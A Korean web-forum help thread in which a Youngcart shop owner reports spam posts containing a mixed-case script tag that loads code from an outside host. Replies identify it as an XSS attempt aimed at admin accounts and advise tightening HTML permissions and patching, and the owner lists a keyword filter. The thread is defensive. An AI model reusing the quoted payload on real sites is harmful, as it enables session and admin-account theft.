SIR

해킹시도일까요? 차단할수있는방법 알수있을까요??

해킹시도일까요? 차단할수있는방법 알수있을까요??

QA

해킹시도일까요? 차단할수있는방법 알수있을까요??

본문

저희 홈페이지 구매후기,Q&A게시판에

 

 <sCRiPt sRC=//0x.ax/dflh></sCrIpT> 이런글이 요즘들어

 

자주 등록되는데 회원가입을 하긴하는데 대포폰인지 연결도되지않고

 

나이도 엄청많은사람 명의로 저런글 도배합니다

 

썼다가 바로지우고 그러던데 혹시 해킹시도인가요?

 

해결방법이있나요? html태그 못하게 막아라는글고 본것같은데

 

영카트자체적으로 어느정도 보안이 되어있나요?ㅠ

이 글을 내 페이스북 계정으로 보내기 이 글을 내 트위터 계정으로 보내기

이 질문에 댓글 쓰기 :

답변 2

채택됨

애드프로님의 답변

HTML 쓰기 권한만 잘되어있으면

해당 스크립트는 무조건 텍스트로 출력되기때문에

상관없습니다.

주소복사
채택됨
답변의 댓글

애드프로님의 답변

중국발 xss 공격 시도입니다.

보통 관리자 계정 탈취가 목적인데

 

해당 공격은 단일패턴이 아니라서 영카트에서도

꾸준하게 취약점 업데이트가 이루어지고 있습니다.

 

우선 html 글쓰기 권한을 일반회원이 아닌 등급으로 올려주세요.

그것만해도 반은 막을수 있습니다.

 

그리고 영카트 보안패치는 가급적 올라오는대로 해주는게 좋습니다.

주소복사
답변의 댓글
대주주님의 댓글
현재HTML 쓰기권한은 관리자만 가능하게 10으로 설정되어있고

혹시몰라 단어필터링에도 sCRiPT,sRC,sCRiPt sRC,/sCrIpT,<,>,/,<,>

입력해뒀는데

게시판에 sCRiPT 입력하면 입력이안되는데 <sCRiPT 이런식으로 시작해버리면

<는 필터링이안되어 글이 등록되는데 <자체를 못쓰게할순없을까요
답변을 작성하시기 전에 로그인 해주세요.
전체 12,880
고마운 분의 도움으로 질문을 해결하셨다면, 채택을 눌러서 감사의 마음을 전하세요.
어떻게 질문해야 할지 모른다면 질문하는 방법을 읽어 보신후 질문해 보세요.
QA 내용 검색

회원로그인

진행중 포인트경매

  1. 참여8 회 시작20.12.02 04:36 종료20.12.09 04:36

(주)에스아이알소프트 (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 대표메일:admin@sir.kr
사업자등록번호:217-81-36347 대표:홍석명 통신판매업신고번호:2014-서울강남-02098호 개인정보보호책임자:이총

© SIRSOFT